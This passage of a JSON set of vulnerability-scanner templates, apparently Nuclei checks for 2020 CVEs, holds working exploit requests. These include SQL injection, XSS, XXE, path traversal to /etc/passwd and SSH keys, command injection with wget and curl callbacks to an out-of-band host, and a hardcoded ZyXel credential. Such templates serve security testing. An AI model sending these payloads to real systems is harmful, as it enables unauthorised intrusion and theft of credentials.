(SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL injection","severity":"critical"},"requests":[{"raw":["GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST 